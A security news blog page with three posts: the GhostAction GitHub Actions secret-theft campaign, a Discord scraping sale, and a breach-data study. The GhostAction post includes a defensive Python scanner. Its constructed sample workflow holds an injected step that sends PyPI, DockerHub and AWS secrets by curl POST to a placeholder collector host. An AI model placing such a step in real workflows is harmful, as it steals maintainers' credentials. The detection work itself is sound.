Showing posts with label leaked sensitive data.

GitHub Supply Chain Attack ‘GhostAction’ Exposes Over 3,000 Secrets Across Ecosystems

A newly uncovered supply chain attack on GitHub, named GhostAction, has compromised more than 3,300 secrets across multiple ecosystems, including PyPI, npm, DockerHub, GitHub, Cloudflare, and AWS. The campaign was first identified by GitGuardian researchers, who traced the initial signs of suspicious activity to the FastUUID project on September 2, 2025. The attack relied on compromised maintainer accounts, which were used to commit malicious workflow files into repositories. These GitHub Actions workflows were configured to trigger automatically on push events or on manual dispatch (the workflow_dispatch event), so the attackers could run them at will once the file was in the repository. 

Once executed, the malicious workflow harvested the secrets injected into the GitHub Actions job environment and transmitted them to an attacker-controlled server through a curl POST request. In FastUUID’s case, the attackers obtained the project’s PyPI token, although no malicious package versions were published before the compromise was detected and contained. Further investigation revealed that the attack extended well beyond a single project: researchers found similar workflow injections across at least 817 repositories, all exfiltrating data to the same domain. To maximize impact, the attackers enumerated the secret names referenced by each repository’s existing legitimate workflows and embedded those references into their own workflow, so a single run could steal every type of secret the repository held. 
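The two signals described above can be checked for mechanically across a repository’s workflow files. The scanner below is an added example written for this post, not GitGuardian’s or GitHub’s tooling: it flags any step that both references `${{ secrets.* }}` values and calls curl or wget against a host outside a release allowlist, and, at repository level, any step that references secrets otherwise owned by two or more other workflows (the hoarding pattern, where the injected file copies secret names from the legitimate workflows). The three workflow texts, the collector host `collector.example.invalid` and the `ALLOWED_HOSTS` list are constructed for the example. The scan is line-based and heuristic by design; it will not see a URL assembled at runtime or a secret written to a file and uploaded by a later step, so treat hits as leads for a commit-history review rather than as verdicts.

```python
"""Heuristic scanner for GitHub Actions workflows that collect secrets and
ship them to an HTTP endpoint (the GhostAction pattern). Added example, not
GitGuardian or GitHub code; standard library only, so workflow files are
split line by line rather than parsed as YAML."""
import re
import sys
from pathlib import Path
from typing import Dict, List, NamedTuple, Tuple

SECRET_REF = re.compile(r"\$\{\{\s*secrets\.([A-Za-z_][A-Za-z0-9_]*)\s*\}\}")
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")
HTTP_CLIENT = re.compile(r"\b(curl|wget|Invoke-WebRequest)\b")
STEP_START = re.compile(r"^\s*-\s+(name|run|uses):\s*(.*)$")

# Hosts a release workflow legitimately talks to. Assumption for the example;
# tailor it to the registries this repository actually publishes to.
ALLOWED_HOSTS = {"github.com", "api.github.com", "upload.pypi.org",
                 "registry.npmjs.org", "index.docker.io"}


class Finding(NamedTuple):
    path: str
    step: str
    secrets: Tuple[str, ...]
    hosts: Tuple[str, ...]
    reason: str


def split_steps(workflow_text: str) -> List[Tuple[str, str]]:
    """Cut a workflow into (step_name, step_text) chunks. A step begins at a
    list item whose first key is name/run/uses; text before the first step
    (triggers, job settings) is dropped."""
    steps: List[Tuple[str, str]] = []
    name, lines = "<unnamed>", []
    for line in workflow_text.splitlines():
        m = STEP_START.match(line)
        if m:
            if lines:
                steps.append((name, "\n".join(lines)))
            name = m.group(2).strip() if m.group(1) == "name" else "<unnamed>"
            lines = [line]
        elif lines:
            lines.append(line)
    if lines:
        steps.append((name, "\n".join(lines)))
    return steps


def scan_workflow(path: str, text: str) -> List[Finding]:
    """Per-step check: secrets plus an HTTP client plus a host outside the
    allowlist, all in one step, is the exfiltration shape to look for."""
    out: List[Finding] = []
    for step, body in split_steps(text):
        secrets = tuple(sorted(set(SECRET_REF.findall(body))))
        foreign = tuple(sorted({h for h in URL_HOST.findall(body) if h not in ALLOWED_HOSTS}))
        if secrets and foreign and HTTP_CLIENT.search(body):
            out.append(Finding(path, step, secrets, foreign,
                               "secrets reach an HTTP client aimed at a non-allowlisted host"))
    return out


def scan_repo(workflows: Dict[str, str]) -> List[Finding]:
    """Repo-level check: a step that references secrets which two or more
    *other* workflows use is collecting secrets it has no business with."""
    usage = {p: set(SECRET_REF.findall(t)) for p, t in workflows.items()}
    findings: List[Finding] = []
    for path, text in workflows.items():
        findings.extend(scan_workflow(path, text))
        for step, body in split_steps(text):
            secrets = set(SECRET_REF.findall(body))
            donors = sorted(p for p, used in usage.items() if p != path and used & secrets)
            if len(donors) >= 2:
                findings.append(Finding(path, step, tuple(sorted(secrets)), (),
                                        f"hoards secrets owned by other workflows: {donors}"))
    return findings


def load_workflows(repo: str) -> Dict[str, str]:
    """Read every .yml/.yaml under .github/workflows of a checked-out repo."""
    root = Path(repo) / ".github" / "workflows"
    return {str(p.relative_to(repo)): p.read_text() for p in sorted(root.glob("*.y*ml"))}


# Constructed sample: two legitimate release workflows plus a CI workflow with
# an injected "Collect" step of the kind described in the post.
SAMPLE_WORKFLOWS: Dict[str, str] = {
    ".github/workflows/ci.yml": """name: CI
on: [push, workflow_dispatch]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Run tests
        run: pytest
      - name: Collect
        env:
          PYPI_API_TOKEN: ${{ secrets.PYPI_API_TOKEN }}
          DOCKERHUB_TOKEN: ${{ secrets.DOCKERHUB_TOKEN }}
          AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
        run: |
          curl -s -X POST https://collector.example.invalid/upload \\
            -d "pypi=$PYPI_API_TOKEN&docker=$DOCKERHUB_TOKEN&aws=$AWS_SECRET_ACCESS_KEY"
""",
    ".github/workflows/publish-pypi.yml": """name: Publish
on:
  release:
    types: [published]
jobs:
  pypi:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Build
        run: python -m build
      - name: Upload to PyPI
        uses: pypa/gh-action-pypi-publish@release/v1
        with:
          password: ${{ secrets.PYPI_API_TOKEN }}
""",
    ".github/workflows/docker.yml": """name: Docker
on:
  push:
    tags: ['v*']
jobs:
  image:
    runs-on: ubuntu-latest
    steps:
      - uses: docker/login-action@v3
        with:
          username: ${{ secrets.DOCKERHUB_USERNAME }}
          password: ${{ secrets.DOCKERHUB_TOKEN }}
      - run: docker build -t example/app . && docker push example/app
""",
}

if __name__ == "__main__":
    workflows = load_workflows(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_WORKFLOWS
    for f in scan_repo(workflows):
        print(f"{f.path} step '{f.step}': {f.reason}; secrets={f.secrets} hosts={f.hosts}")
```

Run it as `python scan_workflows.py /path/to/checkout` to scan a real repository, or with no argument to see the two findings on the constructed sample (both on the injected “Collect” step). A hit means the secrets that step can read should be treated as exposed and rotated, and the commit that introduced the step traced back to the account that pushed it.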

GitGuardian publicly disclosed the findings on September 5, raising issues in 573 affected repositories and notifying security teams at GitHub, npm, and PyPI. By that time, about 100 repositories had already identified the unauthorized commits and reverted them. Soon after the disclosures, the exfiltration endpoint used by the attackers went offline, halting further data transfers. 

The scope of the incident is significant, with researchers estimating that roughly 3,325 secrets were exposed. These included API tokens, access keys, and database credentials spanning several major platforms. At least nine npm packages and 15 PyPI projects remain directly affected, with the risk that compromised tokens could allow the release of malicious or trojanized versions if not revoked. GitGuardian noted that some companies had their entire SDK portfolios compromised, with repositories in Python, Rust, JavaScript, and Go impacted simultaneously. 

While the attack bears some resemblance to the s1ngularity campaign reported in late August, GitGuardian stated that it does not see a direct connection between the two. Instead, GhostAction appears to represent a distinct, large-scale attempt to exploit open-source ecosystems through stolen maintainer credentials and poisoned automation workflows. The findings underscore the growing challenges in securing supply chains that depend heavily on public code repositories and automated build systems.

Nearly Two Billion Discord Messages Scraped and Sold on Dark Web Forums

Security experts have raised alarms after discovering that a massive collection of Discord data is being offered for sale on underground forums. According to researchers at Cybernews, who reviewed the advertisement, the archive reportedly contains close to two billion messages scraped from the platform, alongside additional sensitive information. The dataset allegedly includes 1.8 billion chat messages, records of 35 million users, 207 million voice sessions, and data from 6,000 servers, all available to anyone willing to pay. 

Discord, a platform widely used for gaming, social communities, and professional groups, enables users to connect via text, voice, and video across servers organized around different interests. Many of these servers are open to the public, meaning their content—including usernames, conversations, and community activity—can be accessed by anyone who joins. While much of this information is publicly visible, large-scale automated scraping of it still violates Discord’s Terms of Service and could potentially breach data protection regulations such as the EU’s General Data Protection Regulation (GDPR) or the California Consumer Privacy Act (CCPA).

The true sensitivity of the dataset remains unclear, as no full forensic analysis has been conducted. It is possible that a significant portion of the messages and voice records were collected from publicly accessible servers, which would reduce—but not eliminate—the privacy concerns. However, the act of compiling, distributing, and selling this information at scale introduces new risks, such as the misuse of user data for surveillance, targeted phishing, or identity exploitation. 

Discord has faced similar challenges before. In April 2024, a service known as Spy.Pet attempted to sell billions of archived chat logs from the platform. That operation was swiftly shut down by Discord, which banned the associated accounts and confirmed that the activity violated its rules. At the time, the company emphasized that automated scraping and self-botting were not permitted under its Terms of Service and stated it was exploring possible legal action against offenders. 

The recurrence of large-scale scraping attempts highlights the ongoing tension between the open nature of platforms like Discord and the privacy expectations of their users. While public servers are designed for accessibility and community growth, they can also be exploited by malicious actors seeking to harvest data en masse. Even if the information being sold in the latest case is largely public, the potential to cross-reference user activity across communities raises broader concerns about surveillance and abuse. 

As of now, Discord has not issued an official statement on this latest incident, but based on previous responses, it is likely the company will take steps to disrupt the sale and enforce its policies against scraping. The incident serves as another reminder that users on open platforms should remain mindful of the visibility of their activity and that service providers must continue to balance openness with strong protections against data misuse.

141M Files Analyzed: Alarming New Report Reveals True Scale and Impact of Data Breaches

A comprehensive new study analyzing over 141 million files from 1,297 ransomware and data breach incidents has shed disturbing light on the real risks of modern cyberattacks—particularly the overlooked threat of unstructured data. The research, conducted by cybersecurity firm Lab 1, is being termed the “biggest ever content-level analysis of breached datasets” and offers deep insights into the fallout of these breaches.

While the total number of files may not seem extraordinary when compared to criminal databases boasting 16 billion credentials or the recent exposure of 184 million plaintext passwords, it’s the content of these files that makes this report especially urgent.

According to Robin Brattel, CEO of Lab 1, unlike most analyses that focus on structured data like login credentials, this report examined unstructured files, often housing highly sensitive information. “The analysis focused on the huge risks associated with unstructured files that often hold high-value information, such as cryptographic keys, customer account data, or sensitive commercial contracts,” Brattel noted.

The findings are staggering:

  1. Financial documents were present in 93% of incidents and made up 41% of all files analyzed.
  2. 49% of breaches contained bank statements, and 36% included International Bank Account Numbers (IBANs).
  3. 14% involved wealth statements, and 82% of breaches exposed personal or corporate identifiable information (PII).
  4. 67% of that breached PII came from customer service interactions.
  5. 51% included email leaks that exposed U.S. Social Security numbers.
  6. On average, 54 email addresses were compromised per breach.
  7. Cryptographic keys were discovered in 18% of incidents, with code files accounting for 17%.
  8. System logs appeared in 79%, and images in 81% of cases.

The average breach, according to Lab 1, contains 22,647 files and 13.44 GB of data, with 14 different file types and 22 classifications. Most alarmingly, each breach impacts an average of 482 organizations, demonstrating the far-reaching “blast radius” of cyber incidents.

The report explains that this blast radius has grown 61% over the past three years, significantly increasing systemic risk, regulatory exposure, and reputational damage. Many affected entities are nth-party connections in the supply chain—organizations completely unaware of their data exposure.

In extreme cases, the number of impacted organizations reached 1.73 million in a single breach, while the financial services sector saw an average impact of 4,468 organizations per breach.

As Damian Sutcliffe, former CIO (EMEA) at Goldman Sachs, warns: “We need to stop thinking of breaches as isolated incidents… [the risk] applies to not just that held within our systems, but information held across our entire supply chain.”

Another recent study—the 2025 Ransomware Report by Zscaler ThreatLabz—reinforces these concerns. Deepen Desai, executive VP of cybersecurity at Zscaler, noted a shift in tactics: “Ransomware tactics continue to evolve, with the growing shift toward extortion over encryption as a clear example.” The use of GenAI by attackers has further amplified the threat, enabling more targeted and efficient breaches.

The Zscaler report found:

  • A 146% year-over-year surge in ransomware attacks blocked by its cloud platform.
  • A 92% increase in exfiltrated data volume among the top 10 ransomware groups.
  • Total data stolen rose from 123 TB to 238 TB in just one year.

This escalating trend shows that ransomware is no longer just about locking systems—it’s about weaponizing stolen data.

As cybercriminals increasingly behave like data scientists, capable of mining massive datasets for exploitable intelligence, the need to secure not just networks, but also the unstructured data within them, has never been more critical.